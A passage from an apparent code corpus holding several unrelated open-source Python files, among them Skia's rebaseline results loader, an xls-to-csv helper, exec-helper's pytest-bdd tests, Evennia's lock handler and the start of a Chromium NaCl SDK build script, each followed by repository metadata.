gm_json.JSONKEY_EXPECTEDRESULTS_BUGS,
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE,
gm_json.JSONKEY_EXPECTEDRESULTS_REVIEWED,
]
CATEGORIES_TO_SUMMARIZE = [
'builder', 'test', 'config', 'resultType',
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE,
gm_json.JSONKEY_EXPECTEDRESULTS_REVIEWED,
]
RESULTS_ALL = 'all'
RESULTS_FAILURES = 'failures'
class Results(object):
""" Loads actual and expected results from all builders, supplying combined
reports as requested.
Once this object has been constructed, the results (in self._results[])
are immutable. If you want to update the results based on updated JSON
file contents, you will need to create a new Results object."""
def __init__(self, actuals_root, expected_root, generated_images_root):
"""
Args:
actuals_root: root directory containing all actual-results.json files
expected_root: root directory containing all expected-results.json files
generated_images_root: directory within which to create all pixel diffs;
if this directory does not yet exist, it will be created
"""
time_start = int(time.time())
self._image_diff_db = imagediffdb.ImageDiffDB(generated_images_root)
self._actuals_root = actuals_root
self._expected_root = expected_root
self._load_actual_and_expected()
self._timestamp = int(time.time())
logging.info('Results complete; took %d seconds.' %
(self._timestamp - time_start))
def get_timestamp(self):
"""Return the time at which this object was created, in seconds past epoch
(UTC).
"""
return self._timestamp
def edit_expectations(self, modifications):
"""Edit the expectations stored within this object and write them back
to disk.
Note that this will NOT update the results stored in self._results[] ;
in order to see those updates, you must instantiate a new Results object
based on the (now updated) files on disk.
Args:
modifications: a list of dictionaries, one for each expectation to update:
[
{
'builder': 'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug',
'test': 'bigmatrix',
'config': '8888',
'expectedHashType': 'bitmap-64bitMD5',
'expectedHashDigest': '10894408024079689926',
'bugs': [123, 456],
'ignore-failure': false,
'reviewed-by-human': true,
},
...
]
"""
expected_builder_dicts = Results._read_dicts_from_root(self._expected_root)
for mod in modifications:
image_name = IMAGE_FILENAME_FORMATTER % (mod['test'], mod['config'])
# TODO(epoger): assumes a single allowed digest per test
allowed_digests = [[mod['expectedHashType'],
int(mod['expectedHashDigest'])]]
new_expectations = {
gm_json.JSONKEY_EXPECTEDRESULTS_ALLOWEDDIGESTS: allowed_digests,
}
for field in FIELDS_PASSED_THRU_VERBATIM:
value = mod.get(field)
if value is not None:
new_expectations[field] = value
builder_dict = expected_builder_dicts[mod['builder']]
builder_expectations = builder_dict.get(gm_json.JSONKEY_EXPECTEDRESULTS)
if not builder_expectations:
builder_expectations = {}
builder_dict[gm_json.JSONKEY_EXPECTEDRESULTS] = builder_expectations
builder_expectations[image_name] = new_expectations
Results._write_dicts_to_root(expected_builder_dicts, self._expected_root)
def get_results_of_type(self, type):
"""Return results of some/all tests (depending on 'type' parameter).
Args:
type: string describing which types of results to include; must be one
of the RESULTS_* constants
Results are returned as a dictionary in this form:
{
'categories': # dictionary of categories listed in
# CATEGORIES_TO_SUMMARIZE, with the number of times
# each value appears within its category
{
'resultType': # category name
{
'failed': 29, # category value and total number found of that value
'failure-ignored': 948,
'no-comparison': 4502,
'succeeded': 38609,
},
'builder':
{
'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug': 1286,
'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Release': 1134,
...
},
... # other categories from CATEGORIES_TO_SUMMARIZE
}, # end of 'categories' dictionary
'testData': # list of test results, with a dictionary for each
[
{
'resultType': 'failed',
'builder': 'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug',
'test': 'bigmatrix',
'config': '8888',
'expectedHashType': 'bitmap-64bitMD5',
'expectedHashDigest': '10894408024079689926',
'actualHashType': 'bitmap-64bitMD5',
'actualHashDigest': '2409857384569',
'bugs': [123, 456],
'ignore-failure': false,
'reviewed-by-human': true,
},
...
], # end of 'testData' list
}
"""
return self._results[type]
@staticmethod
def _read_dicts_from_root(root, pattern='*.json'):
"""Read all JSON dictionaries within a directory tree.
Args:
root: path to root of directory tree
pattern: which files to read within root (fnmatch-style pattern)
Returns:
A meta-dictionary containing all the JSON dictionaries found within
the directory tree, keyed by the builder name of each dictionary.
Raises:
IOError if root does not refer to an existing directory
"""
if not os.path.isdir(root):
raise IOError('no directory found at path %s' % root)
meta_dict = {}
for dirpath, dirnames, filenames in os.walk(root):
for matching_filename in fnmatch.filter(filenames, pattern):
builder = os.path.basename(dirpath)
# If we are reading from the collection of actual results, skip over
# the Trybot results (we don't maintain baselines for them).
if builder.endswith('-Trybot'):
continue
fullpath = os.path.join(dirpath, matching_filename)
meta_dict[builder] = gm_json.LoadFromFile(fullpath)
return meta_dict
@staticmethod
def _write_dicts_to_root(meta_dict, root, pattern='*.json'):
"""Write all per-builder dictionaries within meta_dict to files under
the root path.
Security note: this will only write to files that already exist within
the root path (as found by os.walk() within root), so we don't need to
worry about malformed content writing to disk outside of root.
However, the data written to those files is not double-checked, so it
could contain poisonous data.
Args:
meta_dict: a builder-keyed meta-dictionary containing all the JSON
dictionaries we want to write out
root: path to root of directory tree within which to write files
pattern: which files to write within root (fnmatch-style pattern)
Raises:
IOError if root does not refer to an existing directory
KeyError if the set of per-builder dictionaries written out was
different than expected
"""
if not os.path.isdir(root):
raise IOError('no directory found at path %s' % root)
actual_builders_written = []
for dirpath, dirnames, filenames in os.walk(root):
for matching_filename in fnmatch.filter(filenames, pattern):
builder = os.path.basename(dirpath)
# We should never encounter Trybot *expectations*, but if we are
# writing into the actual-results dir, skip the Trybot actuals.
# (I don't know why we would ever write into the actual-results dir,
# though.)
if builder.endswith('-Trybot'):
continue
per_builder_dict = meta_dict.get(builder)
if per_builder_dict is not None:
fullpath = os.path.join(dirpath, matching_filename)
gm_json.WriteToFile(per_builder_dict, fullpath)
actual_builders_written.append(builder)
# Check: did we write out the set of per-builder dictionaries we
# expected to?
expected_builders_written = sorted(meta_dict.keys())
actual_builders_written.sort()
if expected_builders_written != actual_builders_written:
raise KeyError(
'expected to write dicts for builders %s, but actually wrote them '
'for builders %s' % (
expected_builders_written, actual_builders_written))
def _generate_pixel_diffs_if_needed(self, test, expected_image, actual_image):
"""If expected_image and actual_image both exist but are different,
add the image pair to self._image_diff_db and generate pixel diffs.
Args:
test: string; name of test
expected_image: (hashType, hashDigest) tuple describing the expected image
actual_image: (hashType, hashDigest) tuple describing the actual image
"""
if expected_image == actual_image:
return
(expected_hashtype, expected_hashdigest) = expected_image
(actual_hashtype, actual_hashdigest) = actual_image
if None in [expected_hashtype, expected_hashdigest,
actual_hashtype, actual_hashdigest]:
return
expected_url = gm_json.CreateGmActualUrl(
test_name=test, hash_type=expected_hashtype,
hash_digest=expected_hashdigest)
actual_url = gm_json.CreateGmActualUrl(
test_name=test, hash_type=actual_hashtype,
hash_digest=actual_hashdigest)
self._image_diff_db.add_image_pair(
expected_image_locator=expected_hashdigest,
expected_image_url=expected_url,
actual_image_locator=actual_hashdigest,
actual_image_url=actual_url)
def _load_actual_and_expected(self):
"""Loads the results of all tests, across all builders (based on the
files within self._actuals_root and self._expected_root),
and stores them in self._results.
"""
logging.info('Reading actual-results JSON files from %s...' %
self._actuals_root)
actual_builder_dicts = Results._read_dicts_from_root(self._actuals_root)
logging.info('Reading expected-results JSON files from %s...' %
self._expected_root)
expected_builder_dicts = Results._read_dicts_from_root(self._expected_root)
categories_all = {}
categories_failures = {}
Results._ensure_included_in_category_dict(categories_all,
'resultType', [
gm_json.JSONKEY_ACTUALRESULTS_FAILED,
gm_json.JSONKEY_ACTUALRESULTS_FAILUREIGNORED,
gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON,
gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED,
])
Results._ensure_included_in_category_dict(categories_failures,
'resultType', [
gm_json.JSONKEY_ACTUALRESULTS_FAILED,
gm_json.JSONKEY_ACTUALRESULTS_FAILUREIGNORED,
gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON,
])
data_all = []
data_failures = []
builders = sorted(actual_builder_dicts.keys())
num_builders = len(builders)
builder_num = 0
for builder in builders:
builder_num += 1
logging.info('Generating pixel diffs for builder #%d of %d, "%s"...' %
(builder_num, num_builders, builder))
actual_results_for_this_builder = (
actual_builder_dicts[builder][gm_json.JSONKEY_ACTUALRESULTS])
for result_type in sorted(actual_results_for_this_builder.keys()):
results_of_this_type = actual_results_for_this_builder[result_type]
if not results_of_this_type:
continue
for image_name in sorted(results_of_this_type.keys()):
actual_image = results_of_this_type[image_name]
# Default empty expectations; overwrite these if we find any real ones
expectations_per_test = None
expected_image = [None, None]
try:
expectations_per_test = (
expected_builder_dicts
[builder][gm_json.JSONKEY_EXPECTEDRESULTS][image_name])
# TODO(epoger): assumes a single allowed digest per test
expected_image = (
expectations_per_test
[gm_json.JSONKEY_EXPECTEDRESULTS_ALLOWEDDIGESTS][0])
except (KeyError, TypeError):
# There are several cases in which we would expect to find
# no expectations for a given test:
#
# 1. result_type == NOCOMPARISON
# There are no expectations for this test yet!
#
# 2. alternate rendering mode failures (e.g. serialized)
# In cases like
# https://code.google.com/p/skia/issues/detail?id=1684
# ('tileimagefilter GM test failing in serialized render mode'),
# the gm-actuals will list a failure for the alternate
# rendering mode even though we don't have explicit expectations
# for the test (the implicit expectation is that it must
# render the same in all rendering modes).
#
# Don't log type 1, because it is common.
# Log other types, because they are rare and we should know about
# them, but don't throw an exception, because we need to keep our
# tools working in the meanwhile!
if result_type != gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON:
logging.warning('No expectations found for test: %s' % {
'builder': builder,
'image_name': image_name,
'result_type': result_type,
})
# If this test was recently rebaselined, it will remain in
# the 'failed' set of actuals until all the bots have
# cycled (although the expectations have indeed been set
# from the most recent actuals). Treat these as successes
# instead of failures.
#
# TODO(epoger): Do we need to do something similar in
# other cases, such as when we have recently marked a test
# as ignoreFailure but it still shows up in the 'failed'
# category? Maybe we should not rely on the result_type
# categories recorded within the gm_actuals AT ALL, and
# instead evaluate the result_type ourselves based on what
# we see in expectations vs actual checksum?
if expected_image == actual_image:
updated_result_type = gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED
else:
updated_result_type = result_type
(test, config) = IMAGE_FILENAME_RE.match(image_name).groups()
self._generate_pixel_diffs_if_needed(
test=test, expected_image=expected_image,
actual_image=actual_image)
results_for_this_test = {
'resultType': updated_result_type,
'builder': builder,
'test': test,
'config': config,
'actualHashType': actual_image[0],
'actualHashDigest': str(actual_image[1]),
'expectedHashType': expected_image[0],
'expectedHashDigest': str(expected_image[1]),
# FIELDS_PASSED_THRU_VERBATIM that may be overwritten below...
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE: False,
}
if expectations_per_test:
for field in FIELDS_PASSED_THRU_VERBATIM:
results_for_this_test[field] = expectations_per_test.get(field)
if updated_result_type == gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON:
pass # no diff record to calculate at all
elif updated_result_type == gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED:
results_for_this_test['numDifferingPixels'] = 0
results_for_this_test['percentDifferingPixels'] = 0
results_for_this_test['weightedDiffMeasure'] = 0
results_for_this_test['maxDiffPerChannel'] = 0
else:
try:
diff_record = self._image_diff_db.get_diff_record(
expected_image_locator=expected_image[1],
actual_image_locator=actual_image[1])
results_for_this_test['numDifferingPixels'] = (
diff_record.get_num_pixels_differing())
results_for_this_test['percentDifferingPixels'] = (
diff_record.get_percent_pixels_differing())
results_for_this_test['weightedDiffMeasure'] = (
diff_record.get_weighted_diff_measure())
results_for_this_test['maxDiffPerChannel'] = (
diff_record.get_max_diff_per_channel())
except KeyError:
logging.warning('unable to find diff_record for ("%s", "%s")' %
(expected_image[1], actual_image[1]))
pass
Results._add_to_category_dict(categories_all, results_for_this_test)
data_all.append(results_for_this_test)
# TODO(epoger): In effect, we have a list of resultTypes that we
# include in the different result lists (data_all and data_failures).
# This same list should be used by the calls to
# Results._ensure_included_in_category_dict() earlier on.
if updated_result_type != gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED:
Results._add_to_category_dict(categories_failures,
results_for_this_test)
data_failures.append(results_for_this_test)
self._results = {
RESULTS_ALL:
{'categories': categories_all, 'testData': data_all},
RESULTS_FAILURES:
{'categories': categories_failures, 'testData': data_failures},
}
@staticmethod
def _add_to_category_dict(category_dict, test_results):
"""Add test_results to the category dictionary we are building.
(See documentation of self.get_results_of_type() for the format of this
dictionary.)
Args:
category_dict: category dict-of-dicts to add to; modify this in-place
test_results: test data with which to update category_list, in a dict:
{
'category_name': 'category_value',
'category_name': 'category_value',
...
}
"""
for category in CATEGORIES_TO_SUMMARIZE:
category_value = test_results.get(category)
if not category_dict.get(category):
category_dict[category] = {}
if not category_dict[category].get(category_value):
category_dict[category][category_value] = 0
category_dict[category][category_value] += 1
@staticmethod
def _ensure_included_in_category_dict(category_dict,
category_name, category_values):
"""Ensure that the category name/value pairs are included in category_dict,
even if there aren't any results with that name/value pair.
(See documentation of self.get_results_of_type() for the format of this
dictionary.)
Args:
category_dict: category dict-of-dicts to modify
category_name: category name, as a string
category_values: list of values we want to make sure are represented
for this category
"""
if not category_dict.get(category_name):
category_dict[category_name] = {}
for category_value in category_values:
if not category_dict[category_name].get(category_value):
category_dict[category_name][category_value] = 0
def main():
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--actuals', required=True,
help='Directory containing all actual-result JSON files')
parser.add_argument(
'--expectations', required=True,
help='Directory containing all expected-result JSON files')
parser.add_argument(
'--outfile', required=True,
help='File to write result summary into, in JSON format')
parser.add_argument(
'--workdir', default='.workdir',
help='Directory within which to download images and generate diffs')
args = parser.parse_args()
results = Results(actuals_root=args.actuals,
expected_root=args.expectations,
generated_images_root=args.workdir)
gm_json.WriteToFile(results.get_results_of_type(RESULTS_ALL), args.outfile)
if __name__ == '__main__':
main()
|
zhongzw/skia-sdl
|
gm/rebaseline_server/results.py
|
Python
|
bsd-3-clause
| 21,859
|
import csv
import xlrd
def xlstocsv(infile, outfile, ws=0):
book = xlrd.open_workbook(infile)
outcsv = csv.writer(open(outfile, 'w'), delimiter='\t')
sheet = book.sheet_by_index(ws)
numrows = sheet.nrows
numcols = sheet.ncols
for ry in range(numrows):
temprow = list()
for rx in range(numcols):
temprow.append(sheet.cell_value(rowx=ry, colx=rx))
outcsv.writerow(temprow)
|
mubdi/MubdiScripts
|
mubdiscripts/xlstocsv.py
|
Python
|
bsd-3-clause
| 440
|
import pytest
from pytest_bdd import scenarios, given, when, then
from scenarios_run import *
scenarios('../feature/config', example_converters=dict(command = str, environment = Environment, pattern = PatternType))
@given('the <environment> is configured for <command> command in the configuration')
def add_environment_to_command(config, command, environment):
config.commands[command].set_environment(environment)
@given('the <pattern> is configured for <command> command in the configuration')
def add_pattern_to_command(config, command, pattern):
config.commands[command].add_pattern(pattern)
@then('the runtime environment for <command> should contain the given <environment>')
def check_environment(run_environment, command, environment):
runs = run_environment.config.commands[command].runs
actual_env = runs[-1].environment
assert(len(runs) > 0)
for key,value in environment.items():
for permutation in run_environment.config.commands[command].pattern_generator():
replaced_key = key
replaced_value = value
for pattern_key, pattern_value in permutation.items():
replaced_key = replaced_key.replace('{' + pattern_key + '}', pattern_value)
replaced_value = replaced_value.replace('{' + pattern_key + '}', pattern_value)
assert(replaced_key in actual_env)
assert(replaced_value == actual_env[replaced_key])
|
bverhagen/exec-helper
|
test/integration/src/test_config.py
|
Python
|
bsd-3-clause
| 1,444
|
"""
A *lock* defines access to a particular subsystem or property of
Evennia. For example, the "owner" property can be impmemented as a
lock. Or the disability to lift an object or to ban users.
A lock consists of three parts:
- access_type - this defines what kind of access this lock regulates. This
just a string.
- function call - this is one or many calls to functions that will determine
if the lock is passed or not.
- lock function(s). These are regular python functions with a special
set of allowed arguments. They should always return a boolean depending
on if they allow access or not.
A lock function is defined by existing in one of the modules
listed by settings.LOCK_FUNC_MODULES. It should also always
take four arguments looking like this:
funcname(accessing_obj, accessed_obj, *args, **kwargs):
[...]
The accessing object is the object wanting to gain access.
The accessed object is the object this lock resides on
args and kwargs will hold optional arguments and/or keyword arguments
to the function as a list and a dictionary respectively.
Example:
perm(accessing_obj, accessed_obj, *args, **kwargs):
"Checking if the object has a particular, desired permission"
if args:
desired_perm = args[0]
return desired_perm in accessing_obj.permissions.all()
return False
Lock functions should most often be pretty general and ideally possible to
re-use and combine in various ways to build clever locks.
Lock definition ("Lock string")
A lock definition is a string with a special syntax. It is added to
each object's lockhandler, making that lock available from then on.
The lock definition looks like this:
'access_type:[NOT] func1(args)[ AND|OR][NOT] func2() ...'
That is, the access_type, a colon followed by calls to lock functions
combined with AND or OR. NOT negates the result of the following call.
Example:
We want to limit who may edit a particular object (let's call this access_type
for 'edit', it depends on what the command is looking for). We want this to
only work for those with the Permission 'Builder'. So we use our lock
function above and define it like this:
'edit:perm(Builder)'
Here, the lock-function perm() will be called with the string
'Builder' (accessing_obj and accessed_obj are added automatically,
you only need to add the args/kwargs, if any).
If we wanted to make sure the accessing object was BOTH a Builder and a
GoodGuy, we could use AND:
'edit:perm(Builder) AND perm(GoodGuy)'
To allow EITHER Builder and GoodGuys, we replace AND with OR. perm() is just
one example, the lock function can do anything and compare any properties of
the calling object to decide if the lock is passed or not.
'lift:attrib(very_strong) AND NOT attrib(bad_back)'
To make these work, add the string to the lockhandler of the object you want
to apply the lock to:
obj.lockhandler.add('edit:perm(Builder)')
From then on, a command that wants to check for 'edit' access on this
object would do something like this:
if not target_obj.lockhandler.has_perm(caller, 'edit'):
caller.msg("Sorry, you cannot edit that.")
All objects also has a shortcut called 'access' that is recommended to
use instead:
if not target_obj.access(caller, 'edit'):
caller.msg("Sorry, you cannot edit that.")
Permissions
Permissions are just text strings stored in a comma-separated list on
typeclassed objects. The default perm() lock function uses them,
taking into account settings.PERMISSION_HIERARCHY. Also, the
restricted @perm command sets them, but otherwise they are identical
to any other identifier you can use.
"""
from __future__ import print_function
from builtins import object
import re
from django.conf import settings
from evennia.utils import logger, utils
from django.utils.translation import ugettext as _
__all__ = ("LockHandler", "LockException")
WARNING_LOG = settings.LOCKWARNING_LOG_FILE
#
# Exception class. This will be raised
# by errors in lock definitions.
#
class LockException(Exception):
"""
Raised during an error in a lock.
"""
pass
#
# Cached lock functions
#
_LOCKFUNCS = {}
def _cache_lockfuncs():
"""
Updates the cache.
"""
global _LOCKFUNCS
_LOCKFUNCS = {}
for modulepath in settings.LOCK_FUNC_MODULES:
_LOCKFUNCS.update(utils.callables_from_module(modulepath))
#
# pre-compiled regular expressions
#
_RE_FUNCS = re.compile(r"\w+\([^)]*\)")
_RE_SEPS = re.compile(r"(?<=[ )])AND(?=\s)|(?<=[ )])OR(?=\s)|(?<=[ )])NOT(?=\s)")
_RE_OK = re.compile(r"%s|and|or|not")
#
#
# Lock handler
#
#
class LockHandler(object):
"""
This handler should be attached to all objects implementing
permission checks, under the property 'lockhandler'.
"""
def __init__(self, obj):
"""
Loads and pre-caches all relevant locks and their functions.
Args:
obj (object): The object on which the lockhandler is
defined.
"""
if not _LOCKFUNCS:
_cache_lockfuncs()
self.obj = obj
self.locks = {}
try:
self.reset()
except LockException as err:
logger.log_trace(err)
def __str__(self):
return ";".join(self.locks[key][2] for key in sorted(self.locks))
def _log_error(self, message):
"Try to log errors back to object"
raise LockException(message)
def _parse_lockstring(self, storage_lockstring):
"""
Helper function. This is normally only called when the
lockstring is cached and does preliminary checking. locks are
stored as a string
atype:[NOT] lock()[[ AND|OR [NOT] lock()[...]];atype...
Args:
storage_locksring (str): The lockstring to parse.
"""
locks = {}
if not storage_lockstring:
return locks
duplicates = 0
elist = [] # errors
wlist = [] # warnings
for raw_lockstring in storage_lockstring.split(';'):
if not raw_lockstring:
continue
lock_funcs = []
try:
access_type, rhs = (part.strip() for part in raw_lockstring.split(':', 1))
except ValueError:
logger.log_trace()
return locks
# parse the lock functions and separators
funclist = _RE_FUNCS.findall(rhs)
evalstring = rhs
for pattern in ('AND', 'OR', 'NOT'):
evalstring = re.sub(r"\b%s\b" % pattern, pattern.lower(), evalstring)
nfuncs = len(funclist)
for funcstring in funclist:
funcname, rest = (part.strip().strip(')') for part in funcstring.split('(', 1))
func = _LOCKFUNCS.get(funcname, None)
if not callable(func):
elist.append(_("Lock: lock-function '%s' is not available.") % funcstring)
continue
args = list(arg.strip() for arg in rest.split(',') if arg and '=' not in arg)
kwargs = dict([arg.split('=', 1) for arg in rest.split(',') if arg and '=' in arg])
lock_funcs.append((func, args, kwargs))
evalstring = evalstring.replace(funcstring, '%s')
if len(lock_funcs) < nfuncs:
continue
try:
# purge the eval string of any superfluous items, then test it
evalstring = " ".join(_RE_OK.findall(evalstring))
eval(evalstring % tuple(True for func in funclist), {}, {})
except Exception:
elist.append(_("Lock: definition '%s' has syntax errors.") % raw_lockstring)
continue
if access_type in locks:
duplicates += 1
wlist.append(_("LockHandler on %(obj)s: access type '%(access_type)s' changed from '%(source)s' to '%(goal)s' " %
{"obj": self.obj, "access_type": access_type, "source": locks[access_type][2], "goal": raw_lockstring}))
locks[access_type] = (evalstring, tuple(lock_funcs), raw_lockstring)
if wlist and WARNING_LOG:
# a warning text was set, it's not an error, so only report
logger.log_file("\n".join(wlist), WARNING_LOG)
if elist:
# an error text was set, raise exception.
raise LockException("\n".join(elist))
# return the gathered locks in an easily executable form
return locks
def _cache_locks(self, storage_lockstring):
"""
Store data
"""
self.locks = self._parse_lockstring(storage_lockstring)
def _save_locks(self):
"""
Store locks to obj
"""
self.obj.lock_storage = ";".join([tup[2] for tup in self.locks.values()])
def cache_lock_bypass(self, obj):
"""
We cache superuser bypass checks here for efficiency. This
needs to be re-run when an account is assigned to a character.
We need to grant access to superusers. We need to check both
directly on the object (accounts), through obj.account and using
the get_account() method (this sits on serversessions, in some
rare cases where a check is done before the login process has
yet been fully finalized)
Args:
obj (object): This is checked for the `is_superuser` property.
"""
self.lock_bypass = hasattr(obj, "is_superuser") and obj.is_superuser
def add(self, lockstring):
"""
Add a new lockstring to handler.
Args:
lockstring (str or list): A string on the form
`"<access_type>:<functions>"`. Multiple access types
should be separated by semicolon (`;`). Alternatively,
a list with lockstrings.
Returns:
success (bool): The outcome of the addition, `False` on
error.
"""
if isinstance(lockstring, basestring):
lockdefs = lockstring.split(";")
else:
lockdefs = [lockdef for locks in lockstring for lockdef in locks.split(";")]
lockstring = ";".join(lockdefs)
# sanity checks
for lockdef in lockdefs:
if ':' not in lockdef:
self._log_error(_("Lock: '%s' contains no colon (:).") % lockdef)
return False
access_type, rhs = [part.strip() for part in lockdef.split(':', 1)]
if not access_type:
self._log_error(_("Lock: '%s' has no access_type (left-side of colon is empty).") % lockdef)
return False
if rhs.count('(') != rhs.count(')'):
self._log_error(_("Lock: '%s' has mismatched parentheses.") % lockdef)
return False
if not _RE_FUNCS.findall(rhs):
self._log_error(_("Lock: '%s' has no valid lock functions.") % lockdef)
return False
# get the lock string
storage_lockstring = self.obj.lock_storage
if storage_lockstring:
storage_lockstring = storage_lockstring + ";" + lockstring
else:
storage_lockstring = lockstring
# cache the locks will get rid of eventual doublets
self._cache_locks(storage_lockstring)
self._save_locks()
return True
def replace(self, lockstring):
"""
Replaces the lockstring entirely.
Args:
lockstring (str): The new lock definition.
Return:
success (bool): False if an error occurred.
Raises:
LockException: If a critical error occurred.
If so, the old string is recovered.
"""
old_lockstring = str(self)
self.clear()
try:
return self.add(lockstring)
except LockException:
self.add(old_lockstring)
raise
def get(self, access_type=None):
"""
Get the full lockstring or the lockstring of a particular
access type.
Args:
access_type (str, optional):
Returns:
lockstring (str): The matched lockstring, or the full
lockstring if no access_type was given.
"""
if access_type:
return self.locks.get(access_type, ["", "", ""])[2]
return str(self)
def all(self):
"""
Return all lockstrings
Returns:
lockstrings (list): All separate lockstrings
"""
return str(self).split(';')
def remove(self, access_type):
"""
Remove a particular lock from the handler
Args:
access_type (str): The type of lock to remove.
Returns:
success (bool): If the access_type was not found
in the lock, this returns `False`.
"""
if access_type in self.locks:
del self.locks[access_type]
self._save_locks()
return True
return False
delete = remove # alias for historical reasons
def clear(self):
"""
Remove all locks in the handler.
"""
self.locks = {}
self.lock_storage = ""
self._save_locks()
def reset(self):
"""
Set the reset flag, so the the lock will be re-cached at next
checking. This is usually called by @reload.
"""
self._cache_locks(self.obj.lock_storage)
self.cache_lock_bypass(self.obj)
def check(self, accessing_obj, access_type, default=False, no_superuser_bypass=False):
"""
Checks a lock of the correct type by passing execution off to
the lock function(s).
Args:
accessing_obj (object): The object seeking access.
access_type (str): The type of access wanted.
default (bool, optional): If no suitable lock type is
found, default to this result.
no_superuser_bypass (bool): Don't use this unless you
really, really need to, it makes supersusers susceptible
to the lock check.
Notes:
A lock is executed in the follwoing way:
Parsing the lockstring, we (during cache) extract the valid
lock functions and store their function objects in the right
order along with their args/kwargs. These are now executed in
sequence, creating a list of True/False values. This is put
into the evalstring, which is a string of AND/OR/NOT entries
separated by placeholders where each function result should
go. We just put those results in and evaluate the string to
get a final, combined True/False value for the lockstring.
The important bit with this solution is that the full
lockstring is never blindly evaluated, and thus there (should
be) no way to sneak in malign code in it. Only "safe" lock
functions (as defined by your settings) are executed.
"""
try:
# check if the lock should be bypassed (e.g. superuser status)
if accessing_obj.locks.lock_bypass and not no_superuser_bypass:
return True
except AttributeError:
# happens before session is initiated.
if not no_superuser_bypass and ((hasattr(accessing_obj, 'is_superuser') and accessing_obj.is_superuser) or
(hasattr(accessing_obj, 'account') and hasattr(accessing_obj.account, 'is_superuser') and accessing_obj.account.is_superuser) or
(hasattr(accessing_obj, 'get_account') and (not accessing_obj.get_account() or accessing_obj.get_account().is_superuser))):
return True
# no superuser or bypass -> normal lock operation
if access_type in self.locks:
# we have a lock, test it.
evalstring, func_tup, raw_string = self.locks[access_type]
# execute all lock funcs in the correct order, producing a tuple of True/False results.
true_false = tuple(bool(tup[0](accessing_obj, self.obj, *tup[1], **tup[2])) for tup in func_tup)
# the True/False tuple goes into evalstring, which combines them
# with AND/OR/NOT in order to get the final result.
return eval(evalstring % true_false)
else:
return default
def _eval_access_type(self, accessing_obj, locks, access_type):
"""
Helper method for evaluating the access type using eval().
Args:
accessing_obj (object): Object seeking access.
locks (dict): The pre-parsed representation of all access-types.
access_type (str): An access-type key to evaluate.
"""
evalstring, func_tup, raw_string = locks[access_type]
true_false = tuple(tup[0](accessing_obj, self.obj, *tup[1], **tup[2])
for tup in func_tup)
return eval(evalstring % true_false)
def check_lockstring(self, accessing_obj, lockstring, no_superuser_bypass=False,
default=False, access_type=None):
"""
Do a direct check against a lockstring ('atype:func()..'),
without any intermediary storage on the accessed object.
Args:
accessing_obj (object or None): The object seeking access.
Importantly, this can be left unset if the lock functions
don't access it, no updating or storage of locks are made
against this object in this method.
lockstring (str): Lock string to check, on the form
`"access_type:lock_definition"` where the `access_type`
part can potentially be set to a dummy value to just check
a lock condition.
no_superuser_bypass (bool, optional): Force superusers to heed lock.
default (bool, optional): Fallback result to use if `access_type` is set
but no such `access_type` is found in the given `lockstring`.
access_type (str, bool): If set, only this access_type will be looked up
among the locks defined by `lockstring`.
Return:
access (bool): If check is passed or not.
"""
try:
if accessing_obj.locks.lock_bypass and not no_superuser_bypass:
return True
except AttributeError:
if no_superuser_bypass and ((hasattr(accessing_obj, 'is_superuser') and accessing_obj.is_superuser) or
(hasattr(accessing_obj, 'account') and hasattr(accessing_obj.account, 'is_superuser') and accessing_obj.account.is_superuser) or
(hasattr(accessing_obj, 'get_account') and (not accessing_obj.get_account() or accessing_obj.get_account().is_superuser))):
return True
if ":" not in lockstring:
lockstring = "%s:%s" % ("_dummy", lockstring)
locks = self._parse_lockstring(lockstring)
if access_type:
if access_type not in locks:
return default
else:
return self._eval_access_type(
accessing_obj, locks, access_type)
else:
# if no access types was given and multiple locks were
# embedded in the lockstring we assume all must be true
return all(self._eval_access_type(accessing_obj, locks, access_type) for access_type in locks)
def _test():
# testing
class TestObj(object):
pass
import pdb
obj1 = TestObj()
obj2 = TestObj()
# obj1.lock_storage = "owner:dbref(#4);edit:dbref(#5) or perm(Admin);examine:perm(Builder);delete:perm(Admin);get:all()"
#obj1.lock_storage = "cmd:all();admin:id(1);listen:all();send:all()"
obj1.lock_storage = "listen:perm(Developer)"
pdb.set_trace()
obj1.locks = LockHandler(obj1)
obj2.permissions.add("Developer")
obj2.id = 4
# obj1.locks.add("edit:attr(test)")
print("comparing obj2.permissions (%s) vs obj1.locks (%s)" % (obj2.permissions, obj1.locks))
print(obj1.locks.check(obj2, 'owner'))
print(obj1.locks.check(obj2, 'edit'))
print(obj1.locks.check(obj2, 'examine'))
print(obj1.locks.check(obj2, 'delete'))
print(obj1.locks.check(obj2, 'get'))
print(obj1.locks.check(obj2, 'listen'))
|
feend78/evennia
|
evennia/locks/lockhandler.py
|
Python
|
bsd-3-clause
| 20,594
|
import backslash
# py.test style tests here
|
yotamr/backslash-python
|
tests/test_backslash.py
|
Python
|
bsd-3-clause
| 44
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Entry point for both build and try bots
This script is invoked from XXX, usually without arguments
to package an SDK. It automatically determines whether
this SDK is for mac, win, linux.
The script inspects the following environment variables:
BUILDBOT_BUILDERNAME to determine whether the script is run locally
and whether it should upload an SDK to file storage (GSTORE)
"""
# pylint: disable=W0621
# std python includes
import copy
import datetime
import optparse
import os
import re
import subprocess
import sys
# local includes
import buildbot_common
import build_updater
import build_utils
import generate_make
import generate_notice
import manifest_util
import test_sdk
# Create the various paths of interest
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SDK_SRC_DIR = os.path.dirname(SCRIPT_DIR)
